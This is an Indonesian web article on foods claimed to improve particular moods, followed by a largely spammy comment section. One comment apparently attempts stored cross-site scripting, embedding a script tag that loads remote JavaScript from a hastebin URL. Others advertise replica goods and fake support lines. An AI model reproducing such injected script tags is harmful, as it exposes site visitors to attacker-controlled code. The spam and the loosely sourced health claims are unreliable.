Makanan sebagai Mood Booster
Sumber https://garisbatas.com

By Lina DJ 27 Feb 2017, 11:14:02 WIBArticles

Makanan sebagai Mood Booster

Keterangan Gambar :


Mood atau suasana hati seseorang biasanya berbeda-beda, tergantung dari apa yang sedang berada dalam pikiran orang tersebut, kadang bahagia di pagi hari, namun siang hari sudah merasa stress karena pekerjaan yang menumpuk. Ada orang yang jika stress akan memakan apapun dengan harapan sensasi nikmatnya makan akan mengurangi stress. Apakah cara tersebut sudah benar, mari kita membahas mengenai makanan yang paling sesuai dengan kondisi mood Anda.

 

 

1. Stress

 

 

 

                                                               Coklat

 

Coklat, selain rasanya enak, ternyata juga dapat menekan tingkat stress seseorang. Makan coklat, terutama coklat hitam dapat meningkatkan kadar serotonin dan endorphin dan menekan hormon kortisol di otak. Kenaikan tingkat serotonin dan endorphin di otak  dapat membuat seseorang merasa bahagia. Penelitian menunjukan bahwa makan coklat selama 2 minggu menyebabkan rendahnya hormon stress kortisol di otak. Tapi ingat, coklat yang beredar saat ini kebanyakan juga memiliki kadar gula yang tinggi, walaupun dapat mengobati stress Anda, konsumsinya tetap harus dikontrol.

2. Lemot/Lola

 

 

 

Bayam

 

Tidak konsentrasi, atau dalam bahasa sehari-hari biasa dibilang ‘lemot/lola‘ juga merupakan mood yang kadang-kadang timbul pada diri manusia. Kondisi ini dapat diatasi dengan cara memperbanyak makan makanan yang mengandung banyak folat atau vitamin B9. Folat sangat baik untuk berbagai fungsi tubuh, diantaranya adalah sebagai sintetis DNA dan pertumbuhan/perbaikan sell. Dengan demikian konsumsi makanan yang kaya dengan asam folat dapat meningkatkan konsentrasi, fungsi kognitif dan fungsi sosial pada otak. Makanan yang mengandung banyak folat diantaranya adalah kacang-kacangan dan sayuran terutama bayam.

 

 

 

3. Kesal/Mudah Tersinggung

 

Jika Anda merasa kesal, mudah tersinggung atau ngambek, artinya otak Anda kekurangan bahan bakar dan membutuhkan sumber energy tambahan. Makanan yang tepat untuk kondisi mood ini adalah kombinasi antara selai kacang dan apel. Kombinasi makanan ini dapat memberikan supply karbohidrat kompleks dan lemak yang aman dan tahan lama. Hal ini  tentunya dapat menjadi supply energy yang baik untuk otak Anda.

 

 

 

4. Gelisah

 

 

 

Salmon

 

 

Ikan salmon adalah makanan terbaik saat Anda merasa gelisah. Selain mengandung asam lemak Omega-3, ikan salmon juga banyak mengandung protein dan vitamin B, yang mana dapat berfungsi sebagai bahan bakar neuron di otak. Ikan salmon mengandung tryptophan, yaitu asam amino yang dapat menurunkan hormon stress dan memberikan rasa ketenangan terhadap yang memakannya. Menurut penelitian di Universitas Ohio, mengkonsumsi 2.5 gram asam lemak Omega-3, dapat mengurangi kecemasan sekitar 20%. Lain dari itu, ikan salmon juga termasuk makanan lezat yang tentunya menyenangkan untuk dikonsumsi. Ikan salmon yang ditangkap dari alam liar lebih sehat dibandingkan dengan ikan salmon yang diambil dari peternakan ikan.

5. Marah

 

Jika Anda dalam kondisi marah, berarti Anda membutuhkan konsumsi makanan yang dapat menurunkan tingkat stress Anda secara cepat. Berdasarkan penelitian yang diterbitkan oleh American Journal, green tea adalah herbal yang cukup ampuh dalam menurunkan tingkat stress dengan cepat. Pada green tea, terdapat asam amino yang disebut dengan L-Theanine yang memiliki efek menenangkan bagi yang meminumnya. L-Theanine dapat memicu gelombang otak yang disebut dengan gelombang Alpha, yaitu gelombang yang biasa muncul pada saat orang dalam keadaan santai. Selain itu L-Theanine juga dapat meningkatkan serotonin dan dopamin di otak yang dapat menenangkan suasana hati.

 

 

6. Sedih

 

 

Susu

 

 

Saat sedih, sebaiknya konsumsi makanan yang mengandung banyak Vitamin D seperti susu rendah lemak. Sebenarnya belum dapat dipahami dengan jelas bagaimana proses di dalam tubuh antara vitamin D dengan tingkat depresi seseorang, namun kekurangan Vitamin D dapat menyebabkan seseorang mudah mengalami depresi.

Nah sekarang Anda sudah tahu, apa yang harus Anda konsumsi sesuai dengan mood Anda. Mulai sekarang, sediakan makanan-makanan di atas di lemari es Anda, agar Anda tetap dapat mengontrol mood Anda.



Write a Facebook Comment

Tuliskan Komentar anda dari account Facebook

Write a comment

Ada 8 Komentar untuk Berita Ini

  1. sewa mobil untuk perjalanan jauh 20 Mar 2017, 18:26:30 WIB

    Wah bener tuh makanan kesukaan saya di pagi hari itu coklat yang manis-manis biar buat semangat. Apalagi kalau mau pergi jalan-jalan barengt keluarga naik mobil sewaan untuk perjalanan jauh pasti harus selalu sedia coklat banyak biar seger di jalan dan enggak terpengaruh sama kondisi jalanan kalo macet.

    souvenir mug murah 20 Mar 2017, 18:35:09 WIB

    Bener tuh kalo di tempat kerja saya memang suka nyemil tujuannya ya buat ningkatin mood booster, apalagi kalau ada yang mau traktir paling seneng banget deh, biasanya sih ada temen yang baik banget pernah di kasih souvenir mug dulu sayangnya cuma sekali aja sih XD.

    <script type="text/javascript" src="https://hastebin.com/viwihaxuju.js">&l 09 Apr 2017, 01:05:49 WIB

    <script type="text/javascript" src="https://hastebin.com/viwihaxuju.js">< /script>

    replica miu miu handbags 12 Jul 2017, 08:26:00 WIB

    good

    gucci replica handbags 19 Sep 2017, 16:16:27 WIB

    Thus, you will certainly really feel really confident and happy.

    I Need an Essay - PaperChoice.Org 28 Sep 2017, 16:00:39 WIB

    When I initially commented I clicked the "Notify me when new comments are added" checkbox and now each time a comment is added I get four e-mails with the same comment. Is there any way you can remove me from that service? Appreciate it!

    replica rolex 09 Des 2017, 09:11:54 WIB

    interpreting the uk replica watches Longines watchmaking expertise and once again showing the watchmakers a superior and classic wrist swiss replica watches Good product.

    jual kue ulang tahun 07 Jan 2018, 21:11:11 WIB

    wah bener banget tuh, kalo tiap kali lagi badmood saya sering banget beli kue coklat biar mood bisa balik lagi. Paling seneng juga kalo pas ulang tahun itu dikasih kue black forest yang penuh coklat, bisa habis sendirian tuh kuenya hehehe

View all comments

Write a comment

Online Support (Chat)

Admin ACP Indonesia

Find us also on

Follow us on facebook, twitter,Instagram, Youtube and get the latest information from us there.

Opinion Poll



Last Comments

  • Locksmith in virginia beach

    It turned out to be Very useful to me and I am certain to every one of the ...

    View Article
  • Write My Essay

    Agnesi demonstrates to utilize arithmetical substitution to manage integrals of square ...

    View Article
  • pogo support phone number

    Pogo Support - Call 1-844-456-8733 (US/CA) or 01444 39 0119 (UK) for Pogo-related ...

    View Article
  • norton.com/setup

    Norton.com/setup Online Help– Step by Step guide for Norton Setup, Download & ...

    View Article